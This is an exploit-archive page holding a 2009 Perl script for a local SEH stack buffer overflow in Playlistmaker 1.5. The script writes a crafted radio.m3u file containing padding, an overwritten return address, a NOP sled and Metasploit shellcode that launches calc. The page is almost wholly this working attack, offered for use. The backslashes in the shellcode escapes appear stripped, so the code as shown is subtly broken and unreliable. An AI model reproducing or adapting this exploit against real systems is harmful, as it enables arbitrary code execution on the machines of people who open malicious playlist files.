Playlistmaker 1.5 (.M3U/M3L File) Local Stack Overflow Exploit (seh)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Playlistmaker 1.5 (.M3U/M3L File) Local Stack Overflow Exploit (seh)
# Published : 2009-08-06
# Author : germaya_x
# Previous Title : A2 Media Player Pro 2.51 (.m3u /m3l) Universal Local BOF Exploit (SEH)
# Next Title : Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure Exploit

#!/usr/bin/perl
#discoverd by:  germaya_x
#soft:Playlistmaker1.5 (m3l,m3u files) local buffer overflow exploit (SEH)
#Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html
#tested on: xp sp3 (EN)
#bug date:August 06 09
#greetz:hack4love ,devil fucker ,angel
###############################################################################################
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38".
"x78x73x8ax83xebxfcxe2xf4xc4x90x37x8ax38x78xf8xcf".
"x04xf3x0fx8fx40x79x9cx01x77x60xf8xd5x18x79x98xc3".
"xb3x4cxf8x8bxd6x49xb3x13x94xfcxb3xfex3fxb9xb9x87".
"x39xbax98x7ex03x2cx57x8ex4dx9dxf8xd5x1cx79x98xec".
"xb3x74x38x01x67x64x72x61xb3x64xf8x8bxd3xf1x2fxae".
"x3cxbbx42x4ax5cxf3x33xbaxbdxb8x0bx86xb3x38x7fx01".
"x48x64xdex01x50x70x98x83xb3xf8xc3x8ax38x78xf8xe2".
"x04x27x42x7cx58x2exfax72xbbxb8x08xdax50x88xf9x8e".
"x67x10xebx74xb2x76x24x75xdfx1bx12xe6x5bx78x73x8a";
my $bof="A" x 992;
my $eip_next="x33xBFx96x7C"; #
my $nop="x90" x 20;

################################################################################################
open(MYFILE,'>>radio.m3u');
print MYFILE $bof.$eip_next.$nop.$shellcode;
close(MYFILE);
################################################################################################

# www.Syue.com [2009-08-06]